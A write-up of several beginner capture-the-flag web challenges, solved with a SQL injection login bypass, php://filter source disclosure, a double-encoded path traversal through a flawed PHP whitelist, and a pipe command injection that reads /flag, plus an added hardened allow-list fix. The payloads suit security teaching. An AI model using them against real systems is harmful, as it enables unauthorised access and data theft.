[Geek Challenge 2019]EasySQL

admin' or 1=1#
123456

'#' is a comment character, so the query is equivalent to:

SELECT * FROM users WHERE username='admin' or 1=1 --' AND password='123'

[Geek Challenge 2019]Havefun1

View the page source; it contains a comment:

        <!--
$cat=$_GET['cat']; // Read the value named 'cat' from the URL's GET parameters
echo $cat; // Output that value
if($cat=='dog'){ // If the value equals the string 'dog'
    echo 'Syc{cat_cat_cat_cat}'; // then output this flag-like string
}
-->

Add the GET parameter cat=dog to the URL.

[ACTF2020 Freshman Contest]Include

Click the tips link:

http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=flag.php

The file=flag.php parameter suggests that this challenge tests file inclusion.
Use the PHP pseudo-protocol php://filter to read the source code:

php://filter/convert.base64-encode/resource=<target file>

http://13ef86de-b0df-479d-81ed-82f13b3a7db8.node5.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=flag.php

This returns: PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YmQzZGM3YjEtNTNjNC00NTY1LTg2MDItOGZhOTUwOGUyOGY1fQo=
Base64-decode it.

Base64 uses only A-Z, a-z, 0-9, +, / and the padding character =.
Decoding yields the flag.

[HCTF 2018]WarmUp1 (PHP code audit)

View the page source:


<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<!--source.php-->

<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>

Open source.php:

http://d809957d-6301-4f3e-b94f-5b6706582f61.node5.buuoj.cn:81/source.php
<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }
?>

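We need to look at what is passed in the file parameter. The function defines a whitelist with two entries, so open hint.php:
"flag not here, and flag in ffffllllaaaagggg"
In source.php, if $page contains a ?, the part before the ? is extracted and checked against the whitelist.
So URL-encode the ? twice, which gives %253F.
After repeatedly trying different numbers of parent-directory steps: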

http://d809957d-6301-4f3e-b94f-5b6706582f61.node5.buuoj.cn:81/?file=source.php%253F../../../../../ffffllllaaaagggg

This yields the flag.
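
Why the check fails and one way to fix it, as an added example that is not part of the challenge or of the original write-up: checkFile() approves a decoded, truncated copy of the parameter, while include receives the original string. The names ALLOWED_PAGES and resolvePage are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example (not the challenge's code): a hardened replacement for
// emmm::checkFile(). ALLOWED_PAGES and resolvePage() are hypothetical names.

const ALLOWED_PAGES = [
    'source' => 'source.php',
    'hint'   => 'hint.php',
];

/**
 * Map the request value to a fixed file name, or return null.
 * The value is compared exactly once, as received: no urldecode() and no
 * "substring before ?" step, so nothing after a '?' can ride along.
 */
function resolvePage($requested): ?string
{
    if (!is_string($requested)) {
        return null;
    }
    // Strict comparison against the allow-list values.
    $key = array_search($requested, ALLOWED_PAGES, true);
    return $key === false ? null : ALLOWED_PAGES[$key];
}

// Constructed sample inputs. PHP has already URL-decoded the query string
// once, so the value from the write-up arrives containing %3F.
$samples = [
    'source.php',
    'hint.php',
    'source.php?x',
    'source.php%3F../../../../../ffffllllaaaagggg',
    '../ffffllllaaaagggg',
];

foreach ($samples as $s) {
    $file = resolvePage($s);
    printf("%-48s => %s\n", $s, $file === null ? 'rejected' : "include $file");
}

// In the request handler, include the constant taken from the allow-list,
// never $_REQUEST['file'] itself:
//   $file = resolvePage($_REQUEST['file'] ?? null);
//   if ($file !== null) { include __DIR__ . '/' . $file; }
```

Only the first two samples resolve to a file; the other three are rejected because the value that is checked is the same value that selects the file.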

[ACTF2020 Freshman Contest]Exec1

127.0.0.1|ls /
127.0.0.1|ls /flag
127.0.0.1|cat /flag

This yields the flag.